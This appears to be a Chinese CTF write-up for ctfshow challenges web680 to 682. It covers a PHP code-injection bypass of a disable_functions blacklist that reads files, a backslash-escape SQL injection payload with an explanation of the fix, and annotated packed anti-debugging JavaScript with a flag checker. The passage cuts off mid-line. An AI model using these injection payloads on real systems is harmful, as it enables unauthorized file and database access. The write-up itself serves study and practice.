web680
code=phpinfo();
assert,system,passthru,exec,pcntl_exec,shell_exec,popen,
proc_open,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait
,pcntl_wifexited,pcntl_wifstoped,pcntl_wifsignaled,pcntl_wexitstatus,
pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,
pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,fopen,
file_get_contents,fread,file,readfile,opendir,readdir,closedir,rewinddir
以上是 phpinfo 中显示的被禁用函数(disable_functions)。
但这只是一个黑名单:scandir、highlight_file 等不在列表里,所以还是可以列目录、看文件的。
code=var_dump(scandir('/'));
看根目录啥也没有
code=var_dump(scandir('./'));
code=var_dump(scandir('.'));
看当前目录
code=highlight_file('secret_you_never_know');
或者直接访问下载文件
web681
sql注入
select count(*) from ctfshow_users where username = '123' or nickname = '123'
这里两个值都可控,不好直接闭合引号,那就用反斜杠转义
'||1#\
那么原句子就变成了
select count(*) from ctfshow_users where username = '||1#\' or nickname = '||1#\'
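结果变成了
sql语句||1
(末尾的反斜杠转义了 username 的闭合引号,字符串一直延续到 nickname 的开引号才结束;后面的 ||1 成为真正执行的 SQL,# 把其余部分注释掉,所以条件恒为真。修复方式:使用参数化查询/预编译语句,而不是把输入直接拼进 SQL。)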
web682
// Packed script in the p,a,c,k,e,r form: the inner function rebuilds source text
// and the outer eval() executes it.
//   p = packed payload, a = radix (17), c = word count (17),
//   k = dictionary ('|'-separated words), e = index-to-token encoder, r = lookup table.
// Each base-17 token in the payload (0-9, a-g) is replaced by the dictionary word
// at that index; an empty dictionary entry leaves the token unchanged.
//
// Decoded by hand, the payload is an anti-debugging loop:
//   (function(){(function a(){try{(function b(i){
//     if((''+(i/i)).length!==1||i%20===0){(function(){}).constructor('debugger')()}
//     else{debugger}
//     b(++i)})(0)}catch(e){setTimeout(a,5000)}})()})();
// b() recurses without a base case and reaches a `debugger` statement on every call
// (directly, or through the Function constructor when i is 0 or a multiple of 20).
// When the recursion eventually throws, the catch block reschedules a() after 5000 ms.
// With developer tools open this keeps pausing execution; it does not take part in
// the flag check below.
//
// NOTE(review): eval() here runs a constant literal, not external input. For analysis,
// decode the string statically rather than executing it.
eval(function(p,a,c,k,e,r){
e=function(c){
return c.toString(a)};if(!''.replace(/^/,String)){
while(c--)r[e(c)]=k[c]||e(c);k=[function(e){
return r[e]}];e=function(){
return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){(3 a(){7{(3 b(2){9((\'\'+(2/2)).5!==1||2%g===0){(3(){}).8(\'4\')()}c{4}b(++2)})(0)}d(e){f(a,6)}})()})();',17,17,'||i|function|debugger|length|5000|try|constructor|if|||else|catch||setTimeout|20'.split('|'),0,{
}));
/**
 * Convert one lowercase hexadecimal character to its numeric value.
 *
 * 'a'..'f' map to 10..15 and '1'..'9' map to 1..9. Everything else
 * ('0', uppercase letters, punctuation, the empty string, or any string
 * longer than one character) yields 0.
 *
 * @param {string} c - Candidate character.
 * @returns {number} Value in the range 0..15.
 */
var c2n = c => {
  // Only single characters are considered digits.
  if (c.length > 1) {
    return 0;
  }

  // 0x61..0x66 is 'a'..'f'; subtracting 0x57 gives 10..15.
  const code = c.charCodeAt();
  if (code >= 0x61 && code <= 0x66) {
    return code - 0x57;
  }

  // Decimal digits: a single character cannot carry a radix prefix,
  // so base 10 parsing matches the default here. NaN and 0 both fall back to 0.
  const digit = parseInt(c, 10);
  return digit > 0 ? digit : 0;
}
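/**
 * Sum the hex-digit values of every character in a string.
 *
 * Each character is scored by c2n(), so lowercase hex digits contribute
 * their value and any other character (for example '-') contributes 0.
 *
 * @param {string} s - Input string.
 * @returns {number} Sum of the per-character values; 0 for an empty string.
 */
var s2n2su = s => {
  // Keep the accumulator local. The original assigned to an undeclared `r`,
  // which leaks a global in sloppy mode and throws a ReferenceError in
  // strict mode or an ES module.
  let total = 0;
  for (let i = s.length - 1; i >= 0; i--) {
    total += c2n(s[i]);
  }
  return total;
}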
function test(){
var m=document.getElementById("message").value;
var e = 'error';
if(sha256(m)!=="e3a331710b01ff3b3e34d5f61c2c9e1393***ba3e31f814e7debd537c97ed7d3d"){
return alert(e)
}
var start = m.substring(0,8);
if(start!=='ctfshow{'){
return alert(e);
}
if(m.substring(m.length,m.length-1)!=="}"){
return alert(e);
}
var s = m.substring(8,m.length-1)
if(s.length!==36){
return alert(e);
}
var k = s.split("-")
if(k.length!==5){
return alert(e)
}
if(s2n2su(k[0])!==63){
return alert(e)
}
if(sha256(k[0].substr(0,4))!=="c578feba1c2e657dba129b4012***f6a96f8e5f684e2ca358c36df13765da8400"){
return alert(e)
}
if(sha256(k[0].substr(4,8))!=="f9c1c9536***1f2524bc3eadc85b2bec7ff620bf0f227b73bcb96c1f278ba90dc"){
return alert(e)
}
if(parseInt(k[1][0])!==(c2n('a')-1)){
return alert(e)
}
if(k[1][1]+k[1][2]+k[1][3]!=='dda'){
return alert(e)
}
if(k[2][1]!=='e'){
return alert(e)
}
if(k[2][0]+k[2][2]+k[2][3]!=0x1ae){
return alert(e)
}
if(parseInt<